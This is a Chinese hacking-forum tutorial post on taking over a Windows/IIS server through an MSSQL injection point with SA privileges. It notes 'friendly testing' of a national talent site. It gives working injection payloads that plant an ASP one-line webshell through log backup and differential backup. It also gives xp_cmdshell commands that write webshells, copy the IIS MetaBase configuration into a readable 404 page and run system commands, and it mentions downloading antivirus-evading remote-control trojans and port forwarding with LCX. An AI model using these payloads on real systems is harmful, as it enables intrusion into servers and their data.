找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2664|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
' S  {3 ]- ?4 j# N
3 S* b$ Q; {* B7 V6 m0 G* |4 r$ B  D, `6 w
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。8 V7 S* t) N3 v  n& J+ ^5 Z+ x) k
3 X' T0 g3 l% c) k
                                                                 
0 P* M' S7 l  t                                                                 6 ^$ @8 J7 @& U" c5 \
                                                                  论坛: http://www.90team.net/8 z7 }( Q3 j( |/ Y: a
4 e. @# X9 e0 D% k6 ]

& E- N# A' H' _8 K
, M/ V1 Q) v6 b, m友情检测国家人才网
( L6 Z1 L% ~, `  \7 X' T% y1 e1 T% @2 A. P, |

# O2 [" {$ }! I. q0 q内容:MSSQL注入SA权限不显错模式下的入侵% A- \0 U1 ]! O& Q5 [! n  U2 W

8 r" [2 D5 Z4 p: ^& H5 q* B0 k( F: v( s0 m9 J; G
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。  Y8 A( W2 v6 ~3 j6 u

0 \! N& k0 i6 [$ j我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
. z# i0 E; X' U2 q2 c9 r
% K% l$ @. o# h8 ]$ G
5 t. H9 }2 \! S6 u+ E这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。4 I. Z4 K5 C8 N' g

7 N( B" n5 T1 a1 d8 |思路:- o! O! _6 i% U$ {

% {; c- t, v6 O3 `; L- M6 `! R+ b, c首先:0 n5 b3 m! Y: ^% F1 y" U% F

9 N1 _- o, q2 p: K. l1 H通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。7 z% D! [2 E  N$ I% B! j8 V: _

& j2 j, n4 k9 x: B1.日志备份获得Webshell
! l3 `5 p3 e1 O! z/ l& x- g9 e% }) ~
2.数据库差异备份获得Webshell
$ h& u4 E* m6 B& [
* I/ r( M3 N2 Z4.直接下载免杀远控木马。/ a8 }# v! p$ @" [( _5 ?" }
, a/ S4 ]  z) Z" ^( v
5.直接下载LCX将服务器端口转发出来
( C% e3 y5 t$ K" m- U% `+ e: g1 l2 o
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
* |7 S4 H3 h' W" B1 }9 @; ^0 B- B$ T
/ p7 j' y; V3 N3 w$ }7 x7 `6 W# K% y4 @0 I5 Y8 ~9 ]  a5 u
# @- \4 ^( C) r7 V5 A; y
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, $ s$ U+ a( g  u8 C6 Y: N5 i# w' ]

' p! q8 K8 D1 t我直接演示后面一个方法9 B, Z; v  I. n* v- @: X' Y

% o+ ]3 |! x0 @0 D, W/ [) J$ z# t+ O. S( R. l8 E6 E
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 6 M; k5 w3 J- Q/ n
+ J/ N$ J1 b: f& K  g$ \

- F8 ]6 u; K/ H$ e4 L( s6 y$ k% F" }
) E( n+ {$ y* b% I, s2 {# b1 A
◆日志备份:
. M9 @% D: \1 C7 Z. x0 _( k5 W% c7 ~/ z: F2 |- S. F

5 R1 g0 y5 y3 o# v& L; u1. 进行初始备份
) i% ^4 S$ U7 p5 T. X; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--' ~2 L6 J" e6 c1 ~; P. l
# Q% O: A$ R1 M: Q% `
2. 插入数据
7 g! e; ]# n: z  `- g- C. W( p;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
# c- t! U  ^2 g. h5 \" H
, r# i2 U0 ~, }7 y/ H" C0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 z' z2 U5 k  Q7 }" G
  - N4 O+ Q' n" ~: {1 ~9 R% f
3. 备份并获得文件,删除临时表
* _1 L1 i$ b& b0 i& e;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--2 e) h+ z* ^& @

& P! }; }$ v7 q# f- x: O4 n1 r" R& B' o7 f* e3 s

1 [1 k* M- O9 ^◆数据库差异备份
2 h" d+ ~' k  Y4 {4 A
1 r6 U+ d! g# j! T$ ~' F6 P2 h(1. 进行差异备份准备工作
0 P5 A. c  H" {, A, y
( j7 ~6 g: r. J0 `2 c. F: [  Z;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--- L  C6 d1 p+ _7 `. Y, j8 a; L
, b& P% j4 w/ E3 c/ U2 ~
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码% T6 e. C& [: p+ N
$ `) u# {8 X* o) R
' g, P1 q& s) z& d0 _/ g( ^, V
(2. 将数据写入到数据库" A9 C8 i0 u/ Q# V* n0 }
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- " @& a! j, b) w" T

! S+ {& X! r  h- @* d( X8 x0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>" G0 @3 u& q6 W9 U

+ j  A% j( u( V7 T$ L, p. j3. 备份数据库并清理临时文件) `* G5 s8 e% Z( n: `/ w! z$ o

: W2 W1 [: w4 \8 H% G. I;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--7 T+ h+ K: i. y; t$ [

" y; ?' {- V: N# ^0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
( f- Q+ U4 S  ~8 B, Q: Q9 i8 b  {* M8 }1 n2 P* r& F2 Q7 u

4 Z- q. T: ^* u7 m9 ^  D0 ^$ @  z" C! L1 Z% q/ ~4 Q7 ^/ L* x: \
用^转义字符来写ASP(一句话木马)文件的方法:   ) u# V2 K4 H: t* G

5 [9 M- J9 [1 X6 Z' j, V/ u2 y5 R6 r1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
3 m/ ?6 L( n6 N) w' [$ }. ~
* \  k2 D  {% _6 ]) B1 R5 V2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
: @( M  W' S) _# T# b/ U, u" a, P1 N$ u, A2 S# x8 Q
读取IIS配置信息获取web路径
3 ]- N0 g3 B& r2 J0 X" ~1 B+ @  C% O' d& M- f1 M3 o
     1 K6 J3 R1 r$ G# x2 K1 V3 w
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--: v$ s( @- r- ~1 N/ j- y
3 s) U7 q/ u# ~
执行命令
- {9 n$ X. d* s# m7 G5 q6 ^: `     
/ ^6 x0 l8 m7 ]6 z- V% W8 z3 m. s     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--- l4 W$ M, l1 n; A. t: k  z
  A" Q) ~3 M8 q* I
* i' {- c6 S3 ?' a8 `* G

4 x" N" V1 a* z' s3 Y
/ a9 A! R  i! e
1 k) W% r( o2 V+ d+ A" X2 h( U
- r; `* M" c& @% U, o- \" t8 |: ~( b5 B, {

  o( v8 G! n- a' }  }; S5 z7 \0 g
% `- i/ T" g) ~+ T; w8 R+ c- a' R
0 U* N, j/ v; q  Z' a8 m6 p+ ?
- Z8 E8 G+ Y9 h
9 l# J) R9 F; n' j/ z1 Q9 g$ p  d: c3 k( i" v  Q

' s  f% U8 `5 c4 h1 u: R% a8 \* d; j) p2 M
! q+ S9 z0 j/ Z4 P
* ~9 l/ K6 \/ e; Z

; b. _0 a! ]4 n& M" G
/ O8 a) {& c& b. q( c! M1 F2 i; k# s9 @1 n+ \1 [2 z
' w$ v: M8 O( q/ r5 s) C8 Z6 U

. b8 S) Z3 Z$ w9 k& Z- l$ J; t5 ~. \8 C1 I7 d7 k; n

9 B& g1 E( |* n& Q: Q; ]1 `5 ?: Q, I0 ^9 l* I

* O, {( A/ ?9 @: v4 P
/ w% @& R1 L# e( Q8 u! a) d% M+ Z) P2 b. i' |2 A% l
" p# ~/ X5 O& w' \- H* ~
" R  P9 L( i' I

5 f9 z1 j5 l  Z2 w0 ^. [1 i9 q' Z+ h) |

' ?# f9 K6 X4 Z  |) _
+ x: x- ^# f& D8 S. i7 M( }% J1 D
- Q' Q" v: N$ L; H6 m3 i
: W, E% Q, C6 a, d/ E# j# M" M6 X2 z1 o$ J: U% }# U- z5 t
  x# |, L/ h# l5 c

5 Q0 \$ r9 W2 f) y9 @: H) Y. W8 X; S+ F( ]8 N: c3 e3 E# T

( Q0 H, N* I% w1 B& W
& @* v2 m9 w! l- E& Y; a- _; `: q6 T( d5 b0 ~8 J

/ N: T# T9 C* c4 r) i* X5 C3 s) g* b3 ^2 @# ?8 t
' s; A2 T) B% }
) ^8 o0 U/ P5 j
+ b9 M0 u# k4 v- v) L  [) j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表